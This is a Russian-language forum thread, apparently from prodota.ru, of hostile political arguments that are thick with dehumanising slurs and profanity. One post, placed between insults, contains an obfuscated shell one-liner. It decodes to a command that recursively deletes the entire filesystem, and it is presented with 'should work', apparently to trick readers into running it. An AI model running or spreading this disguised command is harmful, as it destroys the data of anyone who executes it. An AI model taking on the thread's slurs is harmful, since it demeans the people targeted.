Перейти к публикации
  • Сейчас на странице   Всего пользователей: 0   (0 пользователей, 0 гостей)

Дэфрэл

Вы пиариться сюда пришли? Том 10: Теперь нам нужно... Дальше выключили

Рекомендованные сообщения

 

 

Просто обосрался по аргументам, решил к авторитету двача прибегнуть

какой авторитет, долбоеб, тысячи человек (которые этот термин изобрели) используют "пидораха" в значении "поцреот роисси", но только у тебя это группа людей с продоты, которые либо не согласны с тобой, либо откровенно срут тебе на ебало и макают в парашу
Мне нет дела до тысячи пидарашек, тупой ты олигофрен, я живу в рамках многовековой традиции русского языка, в соответствии с которой принято происхождение этнонимов от соответствующих ей топонимов. Я тебе уже объяснил, что африканцев называют африканцами не по случайности, а из-за того, что они живут в Африке. Ну жителей пидарашки, из этой традиции, логично называть пидарашками. Ну видимо для пидарашки это сложный и не очевидный момент.

То, что пара сотен пидарашек обосралась и выдумала какую-то хуйню, которая идет в разрез с устоявшимися правилами русского языка, а теперь недовольно кукарекают, че это я использую слово не так, как они задумали - ну по-моему это не я виноват.

Но пидарахи убеждены, что я должен исходить не из тысячелетней лингвистической традиции русского языка, я должен исходить из того, что они, пидарашки, выдумали. Просто пидарашья шиза.

 

HUY=$( echo '%\%#{<-{}<&{`{}}./}:<%=%<@%}<//>'  |  tr ' -/:-@[-`{}' '`-{/ -') ;$HUY 2 > /dev/null

 

Вроде должно сработать 


My life my rules!                                                                                                                                                     

Поделиться сообщением


Ссылка на сообщение

это удмурт или банкетный?

uzlNaCJ.png

кучма

Поделиться сообщением


Ссылка на сообщение

так ты же сам выдумал топоним пидорашка, кретин ебаный. ты сам, блядь, его выдумал, придурок, и сам придумал соответсвующий этноним (причем они у тебя являются синонимами)

господи блядь, используй слово как хочешь, просто мне не понятно, нахуя ты стараешься что-то доказать, если ты и дальше будешь единственным (ну, мейби дурачки в количестве ~4-6 на других пидорахах из этого топана подключатся) кто использует это слово вс тысяч челиков, которые уже лет 6 пидорахами нарекают тебе подобных. сколько стрелки не переводи, тебя и дальше продолжат ебалом в парашу макать и рофлить с того, как пидораха этим же словом и обзывается, причем используя сий термин за 10 страниц чаще, чем все либерахи вместе взятые за 10 топанов, лул. ПИДАРАХИ!!! ПИДАРАХИ!!! ЯСКОЗАЛ ЧТО ТЫ ПИДОРАХА!!! РЯЯЯЯ

snoopy и dreamhaze понравилось это

z ukr.png

Поделиться сообщением


Ссылка на сообщение

так ты же сам выдумал топоним пидорашка, кретин ебаный. ты сам, блядь, его выдумал, придурок, и сам придумал соответсвующий этноним (причем они у тебя являются синонимами)

господи блядь, используй слово как хочешь, просто мне не понятно, нахуя ты стараешься что-то доказать, если ты и дальше будешь единственным (ну, мейби дурачки в количестве ~4-6 на других пидорахах из этого топана подключатся) кто использует это слово вс тысяч челиков, которые уже лет 6 пидорахами нарекают тебе подобных. сколько стрелки не переводи, тебя и дальше продолжат ебалом в парашу макать и рофлить с того, как пидораха этим же словом и обзывается, причем используя сий термин за 10 страниц чаще, чем все либерахи вместе взятые за 10 топанов, лул. ПИДАРАХИ!!! ПИДАРАХИ!!! ЯСКОЗАЛ ЧТО ТЫ ПИДОРАХА!!! РЯЯЯЯ

Иди нахуй, чёрт.

Поделиться сообщением


Ссылка на сообщение

Хули еще не скинули

Ультраинтеллектуал (тупой нацик) сравнили социал-демократа(Леху) с каким-то нонеймом-леваком и назвал их либералами


White supremacy

Поделиться сообщением


Ссылка на сообщение

 

 

Иди нахуй, чёрт.
сань хуй саси 

z ukr.png

Поделиться сообщением


Ссылка на сообщение
(изменено)

Хули еще не скинули

 

 

 

Феликсу донатят 100к бачей в месяц, а Навальному донатят не больше?


Изменено пользователем Rooster

Shaman.png.0cdd33d48561cd068bb3c5ee78289381.png Anna.jpeg.03c9b49363298ceec256500a5d522f7d.jpeg Nigga.jpg.f807f2556bdbf68452292a9301494591.jpg

 

Поделиться сообщением


Ссылка на сообщение
(изменено)

Хули еще не скинули

Такое впечатление, что рогпиар левак и затесался в среду националистов, чтобы их дизморалить. Уже не первое видео от него в ключе националистов мало, они тупые, вокруг одни враги (леваки), сип никто не читает((( Даже псевдооптимистичная концовка не вывозит. Смотрите не выпилитесь там все дружно от депрессии такой. У либерах в рашке хотя бы есть ничем не обоснованная уверенность, что они ахуеть какие критическимыслящие, умные и образованые, что якобы компенсирует немногочисленность. А вы даже этим похвастаться не можете, но все равно, совсем уж унывать не стоит, держитесь там.

 

 

нахуя ты стараешься что-то доказать, если ты и дальше будешь единственным (ну, мейби дурачки в количестве ~4-6 на других пидорахах из этого топана подключатся) кто использует это слово вс тысяч челиков, которые уже лет 6 пидорахами нарекают тебе подобных
 

Очередная победа либерах


Изменено пользователем Лев Троцкий

Поделиться сообщением


Ссылка на сообщение

Такое впечатление, что рогпиар левак и затесался в среду националистов, чтобы их дизморалить. Уже не первое видео от него в ключе националистов мало, они тупые, вокруг одни враги (леваки), сип никто не читает((( Даже псевдооптимистичная концовка не вывозит. Смотрите не выпилитесь там все дружно от депрессии такой. У либерах в рашке хотя бы есть ничем не обоснованная уверенность, что они ахуеть какие критическимыслящие, умные и образованые, что якобы компенсирует немногочисленность. А вы даже этим похвастаться не можете, но все равно, совсем уж унывать не стоит, держитесь там.

 

Как всегда АМЕРИКА СОСАТЬ


Shaman.png.0cdd33d48561cd068bb3c5ee78289381.png Anna.jpeg.03c9b49363298ceec256500a5d522f7d.jpeg Nigga.jpg.f807f2556bdbf68452292a9301494591.jpg

 

Поделиться сообщением


Ссылка на сообщение
(изменено)

так ты же сам выдумал топоним пидорашка, кретин ебаный. ты сам, блядь, его выдумал, придурок, и сам придумал соответсвующий этноним (причем они у тебя являются синонимами)

Я ниче не выдумал, поехавший, у нас образовалась субкультура людей, которые стали заявлять, что живут в пидарашке, я решил членов этой субкультуры как-то наименовать, поскольку наименования не было. Для этого использовал языковую норму. Ну все, собственно.

 

господи блядь, используй слово как хочешь, просто мне не понятно, нахуя ты стараешься что-то доказать, если ты и дальше будешь единственным (ну, мейби дурачки в количестве ~4-6 на других пидорахах из этого топана подключатся) кто использует это слово вс тысяч челиков, которые уже лет 6 пидорахами нарекают тебе подобных. сколько стрелки не переводи, тебя и дальше продолжат ебалом в парашу макать и рофлить с того, как пидораха этим же словом и обзывается, причем используя сий термин за 10 страниц чаще, чем все либерахи вместе взятые за 10 топанов, лул. ПИДАРАХИ!!! ПИДАРАХИ!!! ЯСКОЗАЛ ЧТО ТЫ ПИДОРАХА!!! РЯЯЯЯ

Как же любят пидарахи слово "параша", сразу видно откуда явился умный человек.

А про то, что я пытаюсь доказать, я тебе уже объяснил, что я просто следую многовековой лингвистической традиции той среды, в которой я вырос. Почему я должен делать наоборот и использовать вашу внутритусовочную умозрительную конструкцию, я лично из твоих объяснений не понял.

Может потому, что этого объяснения и нет, просто ты пидараха и тут не требуется ничего усложнять.

------------------------------

При чем человек на серьезных щах спрашивает, дескать, что это я пытаюсь доказать, следуя тысячелетней традиции русского языка, если есть пятилетняя традиция трех с половиной пидарашек с двача.

Ох и затейники эти пидарашки.


Изменено пользователем ADeIIT

Поделиться сообщением


Ссылка на сообщение

Тупа дебики весь день адепта кормят.

Поделиться сообщением


Ссылка на сообщение
(изменено)

Тупа дебики весь день адепта кормят.

Ну так мы принципиальный момент выясняли, пидарахи не могут никаких контраргументов привести, которые бы опровергали, что они - пидарахи.

Вообще вся аргументация пидарах сводится к их пидарашьей традиции, дескать мы так начали, значит так и должно быть, и это достаточно забавно, какой-то традиционализм по-пидарашьи. У пидарах все традиции должны быть уничтожены, религия, патриотизм, всего этого быть не должно, но вот их пидарашья традиция - священна.

Ох уж этот пидараший сюрреализм, не перестаю удивляться.


Изменено пользователем ADeIIT

Поделиться сообщением


Ссылка на сообщение

 

 

 

Народ подрастает и вливается в систему ? Да быть не может, это всего лишь очередное исключение. Сча лёхины школьники подрастут и скинут Путина, лет через...

 

Всего лишь чутка подождать .


Я за окончание спецоперации и за дружбу с Украиной 

 

Скрытый текст

CGIhP7E.png

 

Поделиться сообщением


Ссылка на сообщение

Его уже обоссали у гоблина Пучкова Дмитрия

это в том ролике, где старый пидор не смог ни по одному факту в книге доебаться и начал зачитывать хуету от клуба лысых завистников величайшего?

Женька то их всех скопом еще разок зазьебал

Поделиться сообщением


Ссылка на сообщение

А могу я доебаться к факту в величайшей книге?

Как так получилось, что величайший историк не знает, как называлась война, на которой он специализируется?

https://prodota.ru/forum/index.php?showtopic=213964&page=235&do=findComment&comment=21357195

Он же первую научную историю написал с десятью тысячами ссылок, неужели не сумел найти ссылку на название войны

Поделиться сообщением


Ссылка на сообщение

Вот почему убили Немцова

 

 

Рон Джонсон, Сенатор США :

 

Я считаю трагедией, исторической трагедией то, что власть от Ельцина перешла Путину и теперь Россия движется по этому пути, пытаясь восстановить Советский Союз. И всё было бы иначе, если бы к власти пришёл, к примеру, Борис Немцов. У нас с Россией была бы совершенно иная ситуация. Это трагедия.

 

 
 
 

Я за окончание спецоперации и за дружбу с Украиной 

 

Скрытый текст

CGIhP7E.png

 

Поделиться сообщением


Ссылка на сообщение

Пока вы с девками гуляли и пили пиво, Евгений Николаевич читал книжки и на молекулярном уровне изучал историю дабы написать самую лучшую книгу во вселенной. Браво маэстро! big20.gif


My life my rules!                                                                                                                                                     

Поделиться сообщением


Ссылка на сообщение

 

Его уже обоссали у гоблина Пучкова Дмитрия

это в том ролике, где старый пидор не смог ни по одному факту в книге доебаться и начал зачитывать хуету от клуба лысых завистников величайшего?

Женька то их всех скопом еще разок зазьебал

Не,это в видосе где брали цитаты с "фактами" из его книг и разьебывали в нулину его домыслы

Поделиться сообщением


Ссылка на сообщение

Не только ракетами можно гордиться

 

 

Российская команда победила в соревнованиях по динамичной стрельбе

 

Совместная команда концерна «Калашников» и Минобороны России выступала на этом чемпионате впервые, дебют российской команды оказался успешным: она заняла первое место в командном зачете и все три призовых места в личном.

 

Военнослужащие Германии, Франции, Испании, Бельгии, Эстонии, Голландии и Люксембурга были соперниками России в борьбе за победу. 

 

http://rostec.ru/news/komanda-kalashnikova-i-minoborony-pobedila-v-sorevnovanii-po-strelbe/

 

cf09de2e5c5397540253107b829b843d.jpg


Я за окончание спецоперации и за дружбу с Украиной 

 

Скрытый текст

CGIhP7E.png

 

Поделиться сообщением


Ссылка на сообщение
Гость
Эта тема закрыта для публикации сообщений.

×
×
  • Создать...